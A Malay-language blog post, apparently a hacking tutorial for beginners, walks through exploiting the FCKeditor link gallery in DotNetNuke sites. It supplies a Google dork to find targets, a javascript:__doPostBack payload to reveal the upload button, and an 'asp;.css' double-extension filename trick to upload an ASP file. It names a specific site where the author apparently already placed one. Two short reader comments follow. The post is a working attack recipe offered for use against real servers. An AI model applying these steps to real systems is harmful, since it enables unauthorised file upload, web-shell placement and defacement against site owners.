Exploit 1 : providers/htmleditorproviders/fck/fcklinkgallery.aspx
Exploit 2 : javascript:__doPostBack('ctlURL$cmdUpload','')
1. Masukkan dork "inurl:fck/fcklinkgallery"
2. Cari target anda contoh "http://scfpd.org/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
3. Pilih "File (A File On Your Site)"
4. Padam URL dan gantikan dengan exploit "javascript:__doPostBack('ctlURL$cmdUpload','')".
> Bagi pengguna Google Chrome perkataan "javascript:" haruslah ditaip secara manual.
5. Kemudian pilih "choose file" dan upload file html anda tetapi anda haruslah menggunakan extension seperti .css, seperti dalam tutorial ini saya menggunakan file yang telah saya tambah extension .css dihujungnya. "Muz_c0der.asp;.css"
6. Setelah selesai upload, anda boleh melihat hasilnya dengan memambahkan "portals/0/namafileanda" di hujung URL contoh seperti yang telah saya buat : "http://scfpd.org/portals/0/Muz_c0der.asp;.css"
7. Enjoy !!
Tunggukan POC seterusnya pada edisi akan datang...
Ini satu cara lama dan ramai sudah mengetahui...
So yang masta jangan baca khas untuk NEWBIE sahaja...
Hehe... Sharing Is Caring...
3 comments:
suka oku mongoi blog mu ti mcm2 ada :)
suka oku mongoi blog mu ti mcm2 ada :)
@peGuaM_BiSaYa
aru nini ulun bisaya mongoi siti...hehe
Post a Comment